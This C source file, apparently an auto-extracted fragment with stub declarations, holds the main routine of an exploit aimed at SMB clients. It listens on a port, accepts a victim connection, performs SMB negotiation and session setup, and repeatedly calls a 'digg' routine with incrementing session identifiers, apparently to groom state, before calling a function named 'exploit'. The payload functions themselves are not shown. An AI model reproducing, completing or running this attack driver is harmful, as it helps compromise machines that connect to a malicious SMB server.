
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int socklen_t ;
typedef int servaddr ;
typedef int pid_t ;
typedef int cliaddr ;


 int AF_INET ;
 int INADDR_ANY ;
 int PORT ;
 int SOCK_STREAM ;
 int accept (int,struct sockaddr*,int*) ;
 int bind (int,struct sockaddr*,int) ;
 int bzero (struct sockaddr_in*,int) ;
 int close (int) ;
 int digg (int,unsigned long,unsigned long,unsigned long,unsigned long,int) ;
 int exploit (int,unsigned long,unsigned long,unsigned long,unsigned long) ;
 int htonl (int ) ;
 int htons (int ) ;
 char* inet_ntoa (TYPE_1__) ;
 int listen (int,int) ;
 int neg (int) ;
 int printf (char*,...) ;
 int sessionsetup (int,unsigned long,unsigned long,int) ;
 int socket (int ,int ,int ) ;

int
main ( int argc, char* argv[] )
{
 int s1, s2, i;
 unsigned long fid = 0x1337;
 unsigned long treeid = 0x0808;
 unsigned long userid = 0x0808;
 unsigned long assocgroup = 0x4756;
 pid_t childpid;
 socklen_t clilen;
 struct sockaddr_in cliaddr, servaddr;

 bzero ( &servaddr, sizeof ( servaddr ) );
 servaddr.sin_family = AF_INET;
 servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
 servaddr.sin_port = htons ( PORT );

 s1 = socket ( AF_INET, SOCK_STREAM, 0 );
 bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
 listen ( s1, 1 );

 clilen = sizeof ( cliaddr );

 s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen );

 close ( s1 );

 printf ( "\n%s\n\n", inet_ntoa ( cliaddr.sin_addr ) );

 neg ( s2 );
 sessionsetup ( s2, userid, treeid, 0 );
 for ( i = 0; i < 15; i++ )
 {
  digg ( s2, fid, assocgroup, userid, treeid, 0 );
  fid++;
  assocgroup ++;
 }
 digg ( s2, fid, assocgroup, userid, treeid, 1 );
 fid++;
 assocgroup ++;
 digg ( s2, fid, assocgroup, userid, treeid, 2 );
 fid++;
 assocgroup ++;
 for ( i = 0; i < 4; i++ )
 {
  digg ( s2, fid, assocgroup, userid, treeid, 0 );
  fid++;
  assocgroup ++;
 }
 digg ( s2, fid, assocgroup, userid, treeid, 3 );
 userid++;
 treeid++;
 sessionsetup ( s2, userid, treeid, 1 );
 userid--;
 treeid--;
 for ( i = 0; i < 2; i++ )
 {
  digg ( s2, fid, assocgroup, userid, treeid, 4 );
  fid++;
  assocgroup ++;
 }
 treeid += 2;
 exploit ( s2, fid, assocgroup, userid, treeid );

 printf ( "done!\n" );

 close ( s2 );
}
